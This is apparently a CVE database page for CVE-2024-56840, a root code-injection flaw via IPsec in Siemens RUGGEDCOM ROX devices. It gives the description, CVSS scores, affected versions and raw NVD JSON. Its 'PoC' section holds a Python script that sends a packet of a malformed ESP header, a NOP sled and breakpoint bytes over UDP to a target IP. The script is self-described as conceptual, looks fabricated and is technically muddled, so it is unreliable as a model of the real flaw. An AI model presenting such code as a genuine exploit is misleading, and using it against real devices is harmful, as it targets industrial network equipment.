Security Vulnerability Report
中文
CVE-2024-56840 CVSS 7.2 HIGH

CVE-2024-56840

Published: 2025-12-09 16:17:30
Last Modified: 2026-01-13 10:15:57

Description

A vulnerability has been identified in RUGGEDCOM ROX MX5000 (All versions < V2.17.0), RUGGEDCOM ROX MX5000RE (All versions < V2.17.0), RUGGEDCOM ROX RX1400 (All versions < V2.17.0), RUGGEDCOM ROX RX1500 (All versions < V2.17.0), RUGGEDCOM ROX RX1501 (All versions < V2.17.0), RUGGEDCOM ROX RX1510 (All versions < V2.17.0), RUGGEDCOM ROX RX1511 (All versions < V2.17.0), RUGGEDCOM ROX RX1512 (All versions < V2.17.0), RUGGEDCOM ROX RX1524 (All versions < V2.17.0), RUGGEDCOM ROX RX1536 (All versions < V2.17.0), RUGGEDCOM ROX RX5000 (All versions < V2.17.0). Under certain conditions, IPsec may allow code injection in the affected device. An attacker could leverage this scenario to execute arbitrary code as root user.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:siemens:ruggedcom_rox_ii_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:siemens:ruggedcom_rox_ii:-:*:*:*:*:*:*:* - NOT VULNERABLE
RUGGEDCOM ROX MX5000 < V2.17.0
RUGGEDCOM ROX MX5000RE < V2.17.0
RUGGEDCOM ROX RX1400 < V2.17.0
RUGGEDCOM ROX RX1500 < V2.17.0
RUGGEDCOM ROX RX1501 < V2.17.0
RUGGEDCOM ROX RX1510 < V2.17.0
RUGGEDCOM ROX RX1511 < V2.17.0
RUGGEDCOM ROX RX1512 < V2.17.0
RUGGEDCOM ROX RX1524 < V2.17.0
RUGGEDCOM ROX RX1536 < V2.17.0
RUGGEDCOM ROX RX5000 < V2.17.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-56840 PoC - IPsec Code Injection (Conceptual) # Note: This is a conceptual PoC for educational purposes only # Actual exploitation requires specific device access and configuration import struct import socket def create_ipsec_exploit_packet(): """ Create a malformed IPsec packet to trigger code injection """ # IPsec ESP header construction esp_header = b'\x00\x00' # SPI esp_header += struct.pack('>I', 0x01) # Sequence number # Malformed payload with shellcode # This is a placeholder - actual shellcode would be device-specific shellcode = b'\x90' * 100 # NOP sled shellcode += b'\xcc' * 20 # Breakpoints for debugging # Construct the malicious payload payload = esp_header + shellcode return payload def send_exploit(target_ip, target_port=500): """ Send the exploit packet to target device """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) exploit_packet = create_ipsec_exploit_packet() try: sock.sendto(exploit_packet, (target_ip, target_port)) print(f"Exploit packet sent to {target_ip}:{target_port}") except Exception as e: print(f"Error sending packet: {e}") finally: sock.close() # Usage: python cve_2024_56840_poc.py <target_ip> if __name__ == "__main__": import sys if len(sys.argv) > 1: target = sys.argv[1] send_exploit(target) else: print("Usage: python cve_2024_56840_poc.py <target_ip>")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-56840", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:29.500", "lastModified": "2026-01-13T10:15:57.360", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in RUGGEDCOM ROX MX5000 (All versions < V2.17.0), RUGGEDCOM ROX MX5000RE (All versions < V2.17.0), RUGGEDCOM ROX RX1400 (All versions < V2.17.0), RUGGEDCOM ROX RX1500 (All versions < V2.17.0), RUGGEDCOM ROX RX1501 (All versions < V2.17.0), RUGGEDCOM ROX RX1510 (All versions < V2.17.0), RUGGEDCOM ROX RX1511 (All versions < V2.17.0), RUGGEDCOM ROX RX1512 (All versions < V2.17.0), RUGGEDCOM ROX RX1524 (All versions < V2.17.0), RUGGEDCOM ROX RX1536 (All versions < V2.17.0), RUGGEDCOM ROX RX5000 (All versions < V2.17.0). Under certain conditions, IPsec may allow code injection in the affected device. An attacker could leverage this scenario to execute arbitrary code as root user."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:siemens:ruggedcom_rox_ii_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.17.0", "matchCriteriaId": "FA424C03-CB17-4397-A09E-E02A78F8176C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:siemens:ruggedcom_rox_ii:-:*:*:*:*:*:*:*", "matchCriteriaId": "1EA04F52-40D0-4A4B-9767-265A26EFD98D"}]}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-912274.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}